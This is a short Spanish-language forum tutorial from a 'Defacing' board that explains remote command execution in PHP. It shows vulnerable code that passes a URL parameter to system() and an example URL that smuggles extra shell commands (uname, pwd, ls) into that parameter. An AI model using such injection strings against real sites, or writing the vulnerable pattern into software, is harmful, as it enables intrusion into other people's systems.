vZack
Noviembre 19, 2008, 05:20:03 pm *
Bienvenido(a), Visitante. Favor de ingresar o registrarse.

Ingresar con nombre de usuario, contraseña y duración de la sesión
Noticias: Retos de vZack.com, demuestra todo lo que sabes sobre vulnerabilidades a nivel web click aquí para acceder
 
   Inicio   Ayuda Ingresar Registrarse  
vZack > Underground > Defacing > RCE (Remote Command Execution)
Páginas: [1]   Ir Abajo
« anterior próximo »
  Imprimir  
Autor Tema: RCE (Remote Command Execution)  (Leído 425 veces)
vZor
Administrator
Dios del caos
******
Desconectado Desconectado

Sexo: Masculino
Mensajes: 223
« en: Agosto 19, 2008, 07:01:24 pm »
RCE (Remote Command Execution)

¿De Que se trata?
Es un bug que nos permite ejecutar comandos remotamente.



Ejemplo de codigo vulnerable

Código:
<?php

if(isset($_GET['dir'])){
system('ls '.$_GET['dir']);
}
?>


Explicacion / Como explotarlo

Para explotarlo simplemente metemos nuestro comando, terminando el anterior Tongue
Código:
http://pagina.com/dir.php?dir=a;uname -a;pwd;ls -la

Salu2
En línea
Páginas: [1]   Ir Arriba
  Imprimir  
« anterior próximo »
 
Ir a:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.1 | SMF © 2006-2008, Simple Machines LLC XHTML 1.0 válido! CSS válido!